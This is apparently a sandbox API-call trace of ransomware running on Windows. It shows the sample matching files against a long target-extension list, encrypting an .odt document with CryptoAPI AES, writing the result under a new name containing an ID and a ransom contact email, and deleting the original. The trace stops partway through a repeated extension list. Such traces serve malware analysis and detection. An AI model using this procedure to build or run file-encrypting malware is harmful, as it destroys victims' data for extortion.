	[0188.638] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odt") returned=".odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.639] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.639] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.639] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.650] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x7fb0, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x7fb0, lpOverlapped=0x0) returned 1
	[0188.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.654] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb000) returned 1
	[0188.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.656] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0188.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.657] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.657] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb92b0) returned 1
	[0188.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.657] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x7fb0, dwBufLen=0x7fb0 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x7fc0) returned 1
	[0188.664] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.665] RtlMoveMemory (in: Destination=0xfe5138, Source=0xfdd180, Length=0x7fb0 | out: Destination=0xfe5138) 
	[0188.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.665] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe5138*, pdwDataLen=0x18a1ec*=0x7fb0, dwBufLen=0x7fc0 | out: pbData=0xfe5138*, pdwDataLen=0x18a1ec*=0x7fc0) returned 1
	[0188.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.667] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0188.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.667] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0188.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.668] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0188.668] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.668] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.669] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0188.671] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 138
	[0188.671] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0188.672] WriteFile (in: hFile=0x390, lpBuffer=0xfe5138*, nNumberOfBytesToWrite=0x7fc0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe5138*, lpNumberOfBytesWritten=0x18a648*=0x7fc0, lpOverlapped=0x0) returned 1
	[0188.680] CloseHandle (hObject=0x390) returned 1
	[0188.681] CloseHandle (hObject=0x388) returned 1
	[0188.681] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt")) returned 1
	[0188.688] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\0fgwkow4jv4zzl-25zz9.odt")) returned 0
	[0188.688] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bff30f0, ftCreationTime.dwHighDateTime=0x1d97378, ftLastAccessTime.dwLowDateTime=0x8f1c2950, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x8f1c2950, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x150a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="3sC2NsE6I.ods", cAlternateFileName="3SC2NS~1.ODS")) returned 1
	[0188.688] lstrcmpW (lpString1="3sC2NsE6I.ods", lpString2="..") returned 1
	[0188.688] lstrcmpW (lpString1="3sC2NsE6I.ods", lpString2=".") returned 1
	[0188.688] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.688] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="3sC2NsE6I.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\3sC2NsE6I.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\3sC2NsE6I.ods"
	[0188.689] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\3sC2NsE6I.ods") returned 85
	[0188.689] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.689] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\3sC2NsE6I.ods", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods") returned 0x55
	[0188.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.689] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.689] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods"
	[0188.689] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods") returned 85
	[0188.689] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.694] StrStrW (lpFirst=".ods", lpSrch=".") returned=".ods"
	[0188.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.695] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.opl